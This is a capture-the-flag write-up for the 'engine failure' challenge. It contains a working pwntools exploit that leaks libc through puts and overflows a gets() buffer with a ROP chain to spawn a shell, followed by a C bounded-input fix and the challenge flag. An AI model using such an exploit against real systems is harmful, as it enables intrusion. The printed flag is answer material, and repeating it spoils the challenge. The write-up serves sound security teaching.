Space Heroes CTF 2023 - engine failure (simple rop)

  • [? solves / 245 points]

Analysis

Option 2 prints the libc address of puts, and option 1 lets you reach a call to gets. From there it is the usual ROP.

Solve

Exploit Code

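from pwn import *

# p = process('./engine_failure.bin')
p = remote("spaceheroes-engine-failure.chals.io", 443, ssl=True, sni="spaceheroes-engine-failure.chals.io")
e = ELF('./engine_failure.bin')
# libc = e.libc
libc = ELF('./libc.so.6')

# Option 2 prints the runtime address of puts; subtracting its offset gives the libc base.
p.sendline(b'2')
p.recvuntil(b'0x')
libc.address = int(p.recvline(), 16) - libc.symbols['puts']
info(hex(libc.address))

# Option 1 reaches the gets() call.
p.sendline(b'1')
p.sendline(b'1')

# 0x20 bytes up to the saved rbp, 8 bytes of saved rbp, then the chain for system("/bin/sh").
payload = b'A' * (0x20 + 0x8)
payload += p64(libc.address + 0x2a3e5)             # pop rdi; ret (offset in the provided libc)
payload += p64(next(libc.search(b'/bin/sh\x00')))  # rdi = address of "/bin/sh"
payload += p64(libc.address + 0x29cd6)             # ret, keeps the stack 16-byte aligned for system
payload += p64(libc.symbols['system'])

p.sendline(payload)

p.interactive()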
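
The overflow exists because gets has no length limit. As an added example (not from the original write-up or the challenge source), the C code below shows a bounded replacement for that read that rejects oversized lines; BUF_SIZE is assumed from the 0x20 padding in the script above, and read_line_bounded and check_input are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 0x20 /* assumed from the 0x20 padding in the script above */
/* Unsafe pattern: gets() takes no length, so a long line runs past buf into
 * the saved rbp and return address:  char buf[BUF_SIZE]; gets(buf);  */

/* Hypothetical replacement: read one line into buf (cap bytes incl. NUL).
 * Returns the line length, -1 on EOF/error, -2 if the line did not fit.
 * An oversized line is drained and rejected instead of truncated, so its
 * tail is never parsed as the next menu choice. */
static int read_line_bounded(FILE *in, char *buf, size_t cap)
{
    if (cap < 2 || fgets(buf, (int)cap, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return (int)(len - 1);
    }
    int c = fgetc(in); /* no newline stored: look at what follows */
    if (c == EOF || c == '\n')
        return (int)len; /* line filled the buffer exactly */
    while (c != '\n' && c != EOF)
        c = fgetc(in); /* discard the rest of the line */
    buf[0] = '\0';
    return -2;
}

/* Feed constructed input through a temporary file; returns the status. */
static int check_input(const char *data, char *out, size_t cap)
{
    FILE *in = tmpfile();
    if (in == NULL) return -1;
    fputs(data, in);
    rewind(in);
    int rc = read_line_bounded(in, out, cap);
    fclose(in);
    return rc;
}

int main(void)
{
    char out[BUF_SIZE], big[0x20 + 0x8 + 32 + 2] = {0};
    memset(big, 'A', sizeof big - 2); /* constructed oversized line */
    big[sizeof big - 2] = '\n';
    printf("short=%d ", check_input("1\n", out, sizeof out));
    printf("oversized=%d\n", check_input(big, out, sizeof out));
    return 0;
}
```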

Flag

shctf{3ng1n3s_0ut_w3_4r3_d00med!}